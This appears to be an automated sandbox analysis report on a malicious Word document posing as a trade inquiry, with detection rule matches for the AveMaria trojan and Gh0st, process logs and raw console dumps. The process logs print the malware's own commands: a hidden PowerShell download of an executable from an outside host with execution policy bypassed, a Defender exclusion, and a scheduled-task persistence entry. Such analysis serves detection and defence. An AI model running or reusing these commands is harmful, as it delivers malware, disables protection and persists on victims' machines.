Source: 00000009.00000002.936976360.00000000003D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 1312, type: MEMORYSTR	Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: Process Memory Space: powershell.exe PID: 2072, type: MEMORYSTR	Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27

Source: Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$em Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc

Jump to behavior

Source: classification engine

Classification label: mal100.phis.troj.expl.evad.winDOC@43/31@2/2

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File created: C:\Program Files\Microsoft DN1

Jump to behavior

Source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: .configAMSBUILDDIRECTORYDELETERETRYCOUNTCMSBUILDDIRECTORYDELETRETRYTIMEOUT.sln
Source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release
Source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
Source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD
Source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: *.sln
Source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: MSBuild MyApp.csproj /t:Clean
Source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: /ignoreprojectextensions:.sln
Source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: MSBUILD : error MSB1048: Solution files cannot be debugged directly. Run MSBuild first with an environment variable MSBUILDEMITSOLUTION=1 to create a corresponding ".sln.metaproj" file. Then debug that.

Source: ~WRF{C4F4A2E4-AFFD-48B2-B382-6AEAEB7457BF}.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{C4F4A2E4-AFFD-48B2-B382-6AEAEB7457BF}.tmp.0.dr	OLE document summary: author field not present or empty
Source: ~WRF{C4F4A2E4-AFFD-48B2-B382-6AEAEB7457BF}.tmp.0.dr	OLE document summary: edited time not present or 0

Source: Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc	ReversingLabs: Detection: 32%
Source: Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc	Virustotal: Detection: 50%

Source: C:\Users\user\AppData\Roaming\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................p.......#.................j.....p.........j.......e.....`Ig.......bw.....................Kn.....................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....#................Rfk....X.t.............................}.dw......t.....0...............X.Y.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w..../.......u.r.i.n.g. .a. .W.e.b.C.l.i.e.n.t. .r.e.q.u.e.s.t...".....t.....0.................Y.....6.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w..../................Rfk......t.............................}.dw....H.t.....0...............X.Y.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7...............}.dw....X.t.....0.................Y.....".......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....;................Rfk......t.............................}.dw......t.....0...............X.Y.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....G................Qfk....."Y.............................}.dw....X.t.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....G................Rfk......t.............................}.dw......t.....0...............X.Y.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....S................Qfk....."Y.............................}.dw....H.t.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....S................Rfk......t.............................}.dw......t.....0...............X.Y.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...._................Qfk....."Y.............................}.dw....@.t.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...._................Rfk......t.............................}.dw....x.t.....0...............X.Y.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....k................Qfk....."Y.............................}.dw......t.....0.......................f.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....k................Rfk....h.t.............................}.dw......t.....0...............X.Y.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................E.......w....... ........Qfk....."Y.............................}.dw....x.t.....0.................Y.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....w................Rfk....0.t.............................}.dw......t.....0...............X.Y.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.............,.......p........^......................0.......#.......................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.............,.......p........_......................0.......#.......................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................../...............(.P.............,.......p.......<_......................0......./.......................h...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................../...............(.P.............,.......p.......X_......................0......./.......................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................;...............(.P.............,.......p........_......................0.......;...............\|.......h...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................;...............(.P.............,.......p........_......................0.......;.......................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7........_......................0.......G...............".......h...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................G...............(.P.............,.......p........_......................0.......G.......................h...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................S...............(.P.............,.......l........`......................0.......S.......................h...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................S...............(.P.............,.......l.......&`......................0.......S.......................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................_.......u.y...e.x.e.............,.......l.......P`......................0......._.......................h...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................_...............(.P.............,.......l.......l`......................0......._.......................h...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................k...............(.P.............,.......p........`......................0.......k.......................h...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................k...............(.P.............,.......p........`......................0.......k.......................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......h...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................w...............(.P.............,.......l........a......................0.......w.......................h...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............,.......p.......:a......................0.......................l.......h...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............,.......p.......Wa......................0...............................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P.............,.......p........a......................0...............................h...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............,.......l........a......................0...............................h...............	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ........................................(.P.....................h......./_................................................................).....	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................p.......#.........=.......r.....p.........r.......m.....`Io.......bw.....................Kv.....................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....#...............M.Xk....p\|..............................}.dw.....\|......0.A..............#d.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w..../.......u.r.i.n.g. .a. .W.e.b.C.l.i.e.n.t. .r.e.q.u.e.s.t..."...(.......0.A.............."d.....6.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w..../...............M.Xk....................................}.dw....`.......0.A..............#d.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7...............}.dw....p.......0.A.............."d.....".......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....;...............M.Xk....(...............................}.dw............0.A..............#d.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....G.................Xk....@&d.............................}.dw....p.......0.A.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....G...............M.Xk....(...............................}.dw............0.A..............#d.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....S.................Xk....@&d.............................}.dw....`.......0.A.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....S...............M.Xk....................................}.dw............0.A..............#d.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...._.................Xk....@&d.............................}.dw....X.......0.A.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...._...............M.Xk....................................}.dw............0.A..............#d.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....k.................Xk....@&d.............................}.dw............0.A.....................f.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....k...............M.Xk....................................}.dw............0.A..............#d.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................E.......w....... .........Xk....@&d.............................}.dw............0.A.............."d.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....w...............M.Xk....H...............................}.dw............0.A..............#d.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.............................+v......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.............................Uv......................0.......#.......h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................../...............(.P..............................v......................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................../...............(.P..............................v......................0......./.......h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................;...............(.P.....................l........v......................0.......;...............\|.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................;...............(.P.....................l........v......................0.......;.......h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7........w......................0.......G.......h.......".......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................G...............(.P.....................l.......0w......................0.......G.......h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................S...............(.P.....................l.......[w......................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................S...............(.P.....................l........w......................0.......S.......h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................_.......u.y...e.x.e.....................l........w......................0......._.......h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................_...............(.P.....................x........w......................0......._.......h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................k...............(.P.....................x........x......................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................k...............(.P.....................x....... x......................0.......k.......h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w.......h.......2.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................w...............(.P.....................l.......tx......................0.......w.......h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................l........x......................0.......................l.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................l........x......................0...............h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P.....................l........x......................0...............h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................l........y......................0...............h...............................
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ....................l.).........E.R.R.O.R.:. ...h.......P...............gs................................................................).....
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ....................l.).........E.R.R.O.(.P.....h.......P...............ms..............................................j.......H.........).....
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.....l...............................................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.....l...............x...............................0.......#.......H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................../...............(.P.....l...............x...............................0......./......................... .............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................../...............(.P.....l...............x...............................0......./.......H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................;...............(.P.....l...............x.......4.......................0.......;...............\|......... .............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................;...............(.P.....l.......................Q.......................0.......;.......H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.......y.......................0.......G.......H......."......... .............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................G...............(.P.....l...............................................0.......G.......H................. .............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................S...............(.P.....l...............x...............................0.......S......................... .............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................S...............(.P.....l...............x...............................0.......S.......H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................_.......u.y...e.x.e.....l...............x...............................0......._.......H................. .............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................_...............(.P.....l...............x...............................0......._.......H................. .............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................k...............(.P.....l.......................F.......................0.......k......................... .............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................k...............(.P.....l.......................a.......................0.......k.......H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w.......H.......2......... .............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................w...............(.P.....l...............................................0.......w.......H................. .............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....l...............................................0.......................l......... .............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....l...............................................0...............H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P.....l...............x...............................0...............H................. .............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....l...............x.......0.......................0...............H................. .............
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ................................E.R.R.O.R.:. ...P...............\|................................................. .............................
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ................................E.R.R.O.(.P.....P...............\|.......................................................j.......X...............

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\explorer.exe C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpE14B.tmp
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\explorer.exe C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmp6336.tmp
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\explorer.exe C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpFA37.tmp
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\verclsid.exe "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\notepad.exe C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\verclsid.exe "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\notepad.exe C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\explorer.exe C:\Users\user\AppData\Roaming\explorer.exe	Jump to behavior
